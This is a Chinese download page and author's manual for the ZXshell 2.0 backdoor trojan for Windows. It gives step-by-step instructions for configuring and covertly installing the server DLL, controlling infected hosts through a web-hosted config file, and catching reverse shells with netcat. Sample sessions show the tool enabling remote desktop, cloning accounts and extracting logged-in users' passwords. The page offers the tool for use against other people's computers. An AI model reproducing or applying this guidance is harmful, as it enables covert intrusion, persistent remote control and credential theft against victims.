ZXshell2.0.rar

		当前位置：主页>安全工具>后门程序>软件详细

软件名称：

　ZXshell2.0.rar

文件类型：

界面语言：

　简体中文

软件类型：

　国产软件

运行环境：

　WinNT/2K/Xp

授权方式：

　共享软件

软件大小：

　199K

软件等级：

　★★★★☆

发布时间：

　2004-08-18

官方网址：

http://www.idontknow.com/ 作者：LZX

演示网址：

软件说明：

① 简介

这木马其中一部分是根据Bingle的关于svchost的原理写的，所以跟小榕的bits有相似的地方，加入了类似winshell及更多的的功能，和服务端上线通知的功能。

zxrecv.exe    是用来接收服务端发来的信息，也就是列出在线服务端的信息。
zxshell.exe    是用来配制服务端zxshell.dll。
zxsvc.ini    放在网络上通知服务端的文件。
nc.exe          用于连接服务端的

② 工作原理

   定时读取用户指定在网络上的一个文件，用户通过配置主页空间上的文件通知服务端作出相应响应。
关于服务端的上线通知的实现我引用网络神偷说明书中的一段话：
============================================================================
本软件（网络神偷）用的是另一种更先进的方法：UDP通知，客户端上网后，会将
自己的IP地址写到主页空间的指定文件里，服务端定期读取这个文件的内容，就可得到
客户端的IP地址，并将自己的一些其它信息(主机名、IP地址、上线时间等等)用UDP协
议发送给客户端。
============================================================================

我只是初步模仿了原理，操作方面还得自己动手修改zxsvc.ini，亲自上传，相对麻烦，但是这样对于一些只支持web上传的免费空间则没有限制。

③ 功能简介

A   进程管理器中看不到

B   平时没有端口，只是在系统中充当卧底的角色

C   提供正向连接和反向连接两种功能

D   服务端具有上线通知功能

E   仅适用于Windows2000/XP/2003

命令列表             注释
?                   显示此消息
info                系统版本信息
shell               获得系统命令提示符
download            Http下载
list                列出所有进程
kill                结束指定进程
termsvc             设置终端服务
fpass               查看已登陆用户的密码
clone               克隆/删除任意用户
whoami              显示本服务的进程PID
remove              禁用本服务
exit                退出但不关闭服务端
quit                退出并关闭服务端
reboot              重新启动计算机
shutdown            关闭计算机

④ 使用方法

注意：首先必须有一个WEB空间用于上传 zxsvc.ini.

1、配置器的使用：

先从下拉菜单中任意选择一个将被代替的系统服务,然后填写一个可以从你的WEB空间下载zxsvc.ini的网址。

例如：http://www.xxx.com/zxsvc.ini

你也可以将zxsvc.ini改为其他名字，如 ip.txt,那么你填写的网址就是 http://www.xxx.com/ip.txt

确认无误后按生成按钮就可以得到配置好的zxshell.dll了。

2、安装卸装

   安装   rundll32 zxshell.dll,I      (逗号后的I注意区分大小写)
   卸装   在telnet连上服务端后用remove命令

3、设置zxsvc.ini

用户在其他计算机安装了配置好的服务端后，必须将zxsvc.ini设置好后上传到配制服务端时设定的网址，下面介绍如何设置zxsvc.ini，该文件原始内容如下：
用户只能修“=”后面的内容!

[zxconfig]

MyIP=127.0.0.1        告诉服务端将UDP消息发给这个IP地址,也就是填你自己的IP
Port=2004        告诉服务端打开这个端口等待连接
Password=123456        客户端连接时需要的密码
Banner=Password:    密码提示

BackConnect=0        “0”表示不采用反向连接，也就是打开端口等待连接，“1”表示通知服务端反向连接。
ServerID=123        当BackConnect=1时，这里填的数据就是要通知的服务端的ServerID号，该号在接收到的UDP消息中有提供
LocalPort=8080        当BackConnect=1时，必须配合nc.exe使用，在本地打开端口如：nc -l -p 8080，若想再次接收反弹shell必须使用另一个LocalPort!

设置好后先运行zxrecv.exe（接受服务端的信息），然后将zxsvc.ini上传到你的主页空间，位置必须对应在配制服务端时设定的网址，当服务端读取到该文本后先给MyIP发个信息(主机名、IP地址、ServerID号），再判断BackConnect的值，=0则打开Port等待连接，=1则判断ServerID是否与自己一样，如果是则向MyIP反弹Shell！

4、连接服务端

当zxrecv.exe收到信息时会有嘟嘟的响声，信息格式为：计算机名 @ IP地址 [ServerID]
例如：    BillGates@211.21.x.x[2430]

根据你对zxsvc.ini设置，
如果BackConnect=0时也就是告诉服务端打开Port=2004的这个端口等待连接，

你可以选择windows系统自带的telnet进行连接登陆，方法如下：

打开附件中的命令提示符，然后输入: telnet 211.21.x.x 2004
或者使用著名的nc.exe，格式为：  nc 211.21.x.x 2004
如果成功就会收到密码提示Password:
这时输入你在Password=设置的密码后按回车就可以登陆了，（注意选择windows系统自带的telnet时请使用主键盘的回车！）

登陆成功后会收到服务端的命令列表。

如果BackConnect=1时也就是告诉服务端反向连接，这时你需要配合nc.exe在本机监听端口，

比如：nc -l -p 888
那么你就打开了888端口等待服务端的连接，

这个时候就是要通知指定的服务端执行反连接了，你需要修改zxsvc.ini！
比如你的zxrecv.exe显示：
HostName @ IP [ServerID]

BillGates@211.21.x.x[2430]

那么zxsvc.ini需要改的键值：
MyIP=这里当然还是你的IP

BackConnect=1
ServerID=2430
LocalPort=888

重新将zxsvc.ini上传到服务器上！当服务端读取到新的数据后就会主动向你的888端口连接了!
得到的shell功能和正向连接一致！

C:\>nc -l -p 888

命令列表            注释

?                   显示此消息
info                系统版本信息
shell               获得系统命令提示符
download            Http下载
list                列出所有进程
kill                结束指定进程
termsvc             设置终端服务
fpass               查看已登陆用户的密码
clone               克隆/删除任意用户
whoami              显示本服务的进程PID
remove              禁用本服务
exit                退出但不关闭服务端
quit                退出并关闭服务端
reboot              重新启动计算机
shutdown            关闭计算机

CMD>到此你想执行什么操作就键入对应的命令回车即可!
CMD>info
系统版本：Windows XP Professional
语言：Simplified Chinese
驱动程序版本：07/01/2001,5.1.2600.0

命令成功完成。

CMD>shell

Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

E:\hack>exit

CMD>termsvc      /////此命令可以开启2000\xp\2003的终端，如果是2000的则需要重新启动计算机。
当前的终端服务端口设置为: 3389
要重新设置端口吗? (y/n): n

当前计算机设置为[不允许]远程终端桌面连接.
要改变设置为[允许]吗? (y/n): y

命令成功完成。

CMD>fpass

        查找登陆用户和密码[For WinNT\2000] 有些xp系统也会成功，可能跟设置为自动登陆有关系。

Process         PID
winlogon.exe    392

Domain And User:
LZX-SERVER\zx

增加调试特权成功.
开始在进程PID: 392 中查找 LZX-SERVER\zx 的密码...
在 0x00e40800 找到一个长为 6 字节的编码口令.
获得计算机登陆的信息: 登陆域: LZX-SERVER 用户名: zx 密码: 520520.

CMD>exit

OK，到此就算可以结束了！希望使用者多提宝贵的意见！谢谢你的使用！

                联系方式：Email: cnlzx@tom.com
                             QQ: 5088090

                              ---- LZX
                        2004.07.29

下载地址：

进入下载地址列表

下载说明：

☉推荐使用网际快车下载本站软件，使用 WinRAR v3.10 以上版本解压本站软件。
☉如果这个软件总是不能下载的请点击报告错误,谢谢合作!!
☉下载本站资源，如果服务器暂不能下载请过一段时间重试！
☉如果遇到什么问题，请到本站论坛去咨寻，我们将在那里提供更多、更好的资源！
☉本站提供的一些商业软件是供学习研究之用，如用于商业用途，请购买正版。

[